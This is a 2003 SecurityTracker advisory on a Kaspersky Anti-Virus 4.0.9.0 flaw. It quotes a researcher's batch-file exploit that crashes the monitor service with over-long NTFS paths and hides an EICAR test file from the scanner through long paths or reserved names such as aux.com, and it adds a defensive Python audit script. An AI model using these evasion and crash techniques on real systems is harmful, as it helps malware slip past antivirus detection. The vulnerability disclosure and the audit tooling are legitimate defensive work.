SecurityTracker.com
SecurityTracker
Archives

Category:  Application (Security)  >  Kaspersky Anti-Virus
Vendors:  Kaspersky Lab
Kaspersky Anti-Virus Can Be Crashed By Local Users
SecurityTracker Alert ID:  1006073
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Feb 11 2003
Impact:  Denial of service via local system
Exploit Included:  Yes  
Advisory:  SECURITY.NNOV
Version(s): 4.0.9.0
Description:  A denial of service vulnerability was reported in Kaspersky Anti-Virus. A local user can cause the scanner to crash. A local user can also create malicious files that will not be detected by the scanner.

SECURITY.NNOV reported that a local user can create a file with an NTFS file path longer than 256 characters to cause the KAV monitor service to crash or to consume 100% of available CPU resources. A demonstration exploit batch file is provided in the Source Message.

It is also reported that malicious files with long NTFS file path names will not be detected by the scanner.

It is also reported that malicious files with special NTFS file names (e.g., aux.vbs, aux.com) will not be detected by the scanner.

The vendor has reportedly been notified.

Impact:  A local user can cause the scanner to crash. A local user can create malicious files with certain file path name characteristics to avoid detection.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.kaspersky.com/
Cause:  Boundary error
Underlying OS:  Windows (NT), Windows (2000)
Reported By:  3APA3A <3APA3A@SECURITY.NNOV.RU>
Message History:   None.
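The description above names two path characteristics the scanner mishandles: NTFS paths longer than the 256-character Win32 limit (reachable through the \\?\ prefix) and file names that collide with reserved DOS device names such as aux.vbs or aux.com. The following Python audit script is an added example, not code from the SecurityTracker entry or from the SECURITY.NNOV advisory; it walks a tree (or takes a list of paths) and reports exactly those two conditions so an administrator can find files an affected scanner would skip. The 256-character threshold is the advisory's figure, the reserved-name list is the documented Windows set (CON, PRN, AUX, NUL, COM1-9, LPT1-9), and the sample paths are constructed for the demonstration.

```python
"""Audit file paths for the two conditions the advisory describes:
length beyond the Win32 limit, and reserved DOS device names.

Added example for this SecurityTracker entry, not the advisory's code.
It only reports; it creates and modifies nothing.
"""
import os
import re
import sys
from typing import Iterable, Iterator, List, Optional, Tuple

# Reserved device names. Windows resolves "aux.vbs" to the AUX device
# regardless of the extension, which is the evasion case in the advisory.
RESERVED = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# Length limit. The advisory cites 256; the documented Win32 MAX_PATH is 260
# including the terminating NUL. Default to the advisory's figure.
DEFAULT_MAX_LEN = 256


def strip_extended_prefix(path: str) -> str:
    """Remove the \\\\?\\ (or \\\\?\\UNC\\) prefix so the checks see the plain path.
    The prefix is what lets a caller bypass the API's own length check."""
    if path.upper().startswith("\\\\?\\UNC\\"):
        return "\\\\" + path[8:]          # \\?\UNC\srv\share -> \\srv\share
    if path.startswith("\\\\?\\"):
        return path[4:]                   # \\?\C:\x -> C:\x
    return path


def reserved_device_name(name: str) -> Optional[str]:
    """Return the device name a path component collides with, or None.
    Windows compares the part before the first dot, case-insensitively,
    so 'aux.vbs' and 'Aux.com' both map to AUX; 'comfort.txt' does not."""
    stem = name.split(".", 1)[0].rstrip(" ").upper()
    return stem if stem in RESERVED else None


def audit_paths(paths: Iterable[str],
                max_len: int = DEFAULT_MAX_LEN) -> List[Tuple[str, str]]:
    """Return (original_path, reason) for every path that trips a check.
    A path that is both too long and device-named yields two findings."""
    findings: List[Tuple[str, str]] = []
    for raw in paths:
        path = strip_extended_prefix(raw)
        if len(path) > max_len:
            findings.append((raw, f"path length {len(path)} exceeds {max_len}"))
        # Check every component, not just the leaf: a device-named
        # directory is as anomalous as a device-named file.
        for component in re.split(r"[\\/]", path):
            dev = reserved_device_name(component)
            if dev:
                findings.append((raw, f"component {component!r} resolves to device {dev}"))
                break
    return findings


def walk_tree(root: str) -> Iterator[str]:
    """Yield every directory and file path under root (symlinks not followed)."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            yield os.path.join(dirpath, name)


# Constructed sample input: mirrors the advisory's three cases plus benign names.
SAMPLE_PATHS = [
    r"C:\Users\alice\report.docx",                                   # clean
    r"\\?\C:\aux.com",                                               # device name via prefix
    r"C:\temp\Aux.vbs",                                              # device name, mixed case
    "\\\\?\\C:\\" + "\\".join(["A" * 100] * 3) + "\\payload.com",   # 317 chars after prefix
    r"\\?\UNC\fileserver\share\con",                                 # device name on a UNC path
    r"C:\data\comfort.txt",                                          # 'com' prefix but not reserved
]


if __name__ == "__main__":
    source = walk_tree(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PATHS
    for path, reason in audit_paths(source):
        print(f"{reason}: {path}")
```

Run it with a directory argument to audit a real tree; without one it audits the constructed sample list and reports four findings (the two aux files, the over-long path and the UNC con entry). Because os.walk does not itself use the \\?\ prefix, very deep trees on Windows may need the root passed with that prefix for the walk to descend past the limit.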


 Source Message Contents

Date:  Tue, 11 Feb 2003 13:09:58 +0300
From:  3APA3A <3APA3A@SECURITY.NNOV.RU>
Subject:  SECURITY.NNOV: Kaspersky Antivirus DoS

 


Title:                     Kaspersky Antivirus DoS
Affected:                  Kaspersky  Antivirus 4.0.9.0
                           (Server and Workstation version on
                           Windows NT 4.0 and Windows 2000).
Author:                    ZARAZA <3APA3A@SECURITY.NNOV.RU>
Vendor:                    Kaspersky Lab
Date:                      January, 30 2003
Risk:                      Average
Exploitable:               Yes
Remote:                    Yes (for server versions)
Vendor Notified:           January, 30 2003

I. Introduction:

Kaspersky Antivirus (KAV) is a family of antiviral products.

II. Vulnerability:

A few vulnerabilities were identified. The most serious allows a user to
crash the antiviral server remotely (write access to any directory on the
remote server is required).

1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection

III. Details:

1. Long path crash

The NTFS file system allows paths of almost unlimited length to be
created, but the Windows API does not allow a path longer than 256 bytes.
To prevent the Windows API from checking the requested path, the \\?\
prefix may be added to the filename. This is a documented feature of the
Windows API. Paths longer than 256 characters will cause the KAV monitor
service to crash or hang with 100% CPU usage. The possibility of code
execution has not been researched.

2. Long path prevents malware from detection

A long path will also prevent malware from being detected by the
antiviral scanner.


3. Special name prevents malware from detection

It is possible to create an NTFS file with a name like aux.vbs or aux.com.
Malware in this file will not be detected.

IV. Exploit:

This .bat file demonstrates the vulnerability.

1,2 Long path crash & Long path prevents malware from detection

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com

3. Special name prevents malware from detection

echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\aux.com

V. Vendor:

No response from vendor.

--
http://www.security.nnov.ru
ZARAZA / 3APA3A
You know my name - look up my number (The Beatles)








Copyright 2002, SecurityGlobal.net LLC